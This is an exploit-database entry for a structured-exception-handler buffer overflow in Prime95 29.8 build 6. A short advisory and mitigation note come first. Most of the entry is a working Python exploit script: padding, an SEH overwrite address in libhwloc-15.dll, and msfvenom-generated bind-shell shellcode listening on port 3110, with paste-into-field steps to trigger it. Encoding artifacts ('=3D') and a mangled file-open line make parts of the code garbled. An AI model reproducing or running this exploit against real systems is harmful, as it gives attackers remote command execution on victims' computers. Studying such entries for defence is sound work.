Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)

vendor:

Prime95

by:

Achilles

7.5

CVSS

HIGH

Buffer Overflow (SEH)

119

CWE

Product Name: Prime95

Affected Version From: 29.8 build 6

Affected Version To: 29.8 build 6

Patch Exists: NO

Related CWE: Not provided

CPE: a:prime95:prime95:29.8:build:6

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64

2019

Prime95 Version 29.8 build 6 – Buffer Overflow (SEH)

The Prime95 software version 29.8 build 6 is vulnerable to a buffer overflow (SEH) vulnerability. By running a python code, an attacker can exploit this vulnerability to gain unauthorized access to the system and execute arbitrary code. The exploit involves opening a malicious file, copying its content to the clipboard, and then pasting it into specific fields within the Prime95.exe application. This results in the creation of a bind shell on port 3110, providing the attacker with a remote command execution capability. The vulnerability is present in the libhwloc-15.dll library. The exploit code includes shellcode generated using msfvenom, which ensures compatibility with the Windows platform and avoids certain characters that may cause issues. The exploit has been tested on Windows 7 x64.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of Prime95 that addresses the buffer overflow issue. Additionally, it is recommended to exercise caution when opening files from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Date: 2019-12-22
# Vendor Homepage: https://www.mersenne.org
# Software Link:   http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
# Exploit Author: Achilles
# Tested Version: 29.8 build 6
# Tested on: Windows 7 x64

# 1.- Run python code:Prime95.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open Prime95.exe go to PrimeNet
# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
# 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host"
# 6.- Press ok Twice and you will have a bind shell port 3110
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer =3D "\x41" * 660
nseh =3D "\xeb\x06\x90\x90" #jmp short 6
seh  =3D  struct.pack('<L',0x6ee410b1) #libhwloc-15.dll
nops =3D  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
payload =3D buffer + nseh + seh + nops + shellcode

try:
Dopen("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"